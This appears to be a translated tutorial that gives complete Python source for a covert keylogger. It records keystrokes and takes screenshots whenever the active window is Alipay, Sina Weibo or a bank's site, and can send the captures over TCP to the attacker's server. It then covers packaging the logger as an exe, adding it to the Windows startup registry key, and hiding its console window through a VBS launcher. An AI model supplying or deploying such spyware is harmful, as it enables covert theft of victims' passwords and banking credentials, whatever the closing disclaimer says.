Python USES pyHook to monitor user mouse and keyboard events
- 2020-04-02 13:57:56
- OfStack
This article with a simple monitoring of mouse, keyboard events procedures, to achieve the user's input (such as login some website accounts, passwords) function. Through the test, for a "streaking" computer, can fully access to the user input any information; But if you have anti-virus software installed, that's enough. The specific implementation method is as follows:
One, the code part : get the input information of the user and save it to XX directory together with the screenshot
# -*- coding: utf-8 -*- #
import pythoncom
import pyHook
import time
import socket
from PIL import ImageGrab
#
# If you are remotely listening to a target computer, you can set up your own server and send the information back to the server
#
def send_msg_to_server(msg):
host=""
port=1234
buf_size=1024
addr=(host,port)
if len(msg)>0:
tcp_client_sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
tcp_client_sock.connect(addr)
info=time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))+' from '+socket.gethostname()+':'
tcp_client_sock.sendall(info+msg)
tcp_client_sock.close()
#
# You can also save the information to a local file
#
def write_msg_to_txt(msg):
f=open('D:/workspace/mytest/pyhook/media/monitor.txt','a')
f.write(msg+'rn')
f.close()
def onMouseEvent(event):
# Monitor mouse events
global MSG
if len(MSG)!=0:
#send_msg_to_server(MSG)
write_msg_to_txt(MSG)
MSG=''
pic_name = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))
# Save the screenshot of the user to a local directory (or send it to your own server remotely)
pic = ImageGrab.grab()
pic.save('D:/workspace/mytest/pyhook/media/mouse_%s.png' % pic_name)
return True
def onKeyboardEvent(event):
# Monitor keyboard events
global MSG
title= event.WindowName.decode('GBK')
# Through the website title To determine whether the current website is a "listening target"
if title.find(u" Pay treasure ") != -1 or title.find(u' Sina weibo ')!=-1 or title.find(u' Shanghai pudong development bank ')!=-1:
#Ascii: 8-Backspace , 9-Tab ,13-Enter
if (127 >= event.Ascii > 31) or (event.Ascii == 8):
MSG += chr(event.Ascii)
if (event.Ascii == 9) or (event.Ascii == 13):
#send_msg_to_remote(MSG)
write_msg_to_txt(MSG)
MSG = ''
# Screen capture realization
pic_name = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))
pic = ImageGrab.grab()
# Save a picture named after the date
pic.save('D:/workspace/mytest/pyhook/media/keyboard_%s.png' % pic_name)
return True
if __name__ == "__main__":
MSG = ''
# create hook handle
hm = pyHook.HookManager()
# Monitoring the mouse
hm.SubscribeMouseLeftDown(onMouseEvent)
hm.HookMouse()
# Monitoring the keyboard
hm.KeyDown = onKeyboardEvent
hm.HookKeyboard()
# Loop fetch message
pythoncom.PumpMessages()
2. Package the script with py2exe:
Create a new py file setup.py, and the contents are as follows:
from distutils.core import setup
import py2exe
setup(console=["monitor.py"])
#setup(windows=["monitor.py"])
The command line executes the following command:
pythonsetup.pypy2exe
Iii. Set the program to start automatically:
Step 1:
Put the files you want to boot (create a shortcut, then) into the start/all programs/start directory
Step 2:
Modify the registry: command line - regedit, then go to the following path:
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run]
Create a new "string value" and edit: sets the path to the exe file
D: \ workspace \ mytest \ pyhook \ dist \ monitor exe
(if you start monitor.exe in either of the above ways, a command box will pop up showing the monitor log information. This way, the listener will be able to find it at once. Try the following method.)
Step 3:
Create a new.vbs file as follows:
setwscriptObj=CreateObject("Wscript.Shell")
wscriptObj.run " D:workspacemytestpyhookdistmonitor.exe",0
Double-click to run the VBS file, and monitor. Exe starts in the background (without a large black box popping up).
Then the reference, set the VBS to boot.
Supplement:
1, the program involves some modules need to install their own;
2. In the article, "D: workspace..." Such a path needs to be changed to its own real path;
3, this code is only a test example, readers do not use it for illegal purposes.
Interested readers can improve on this example to make it more functional.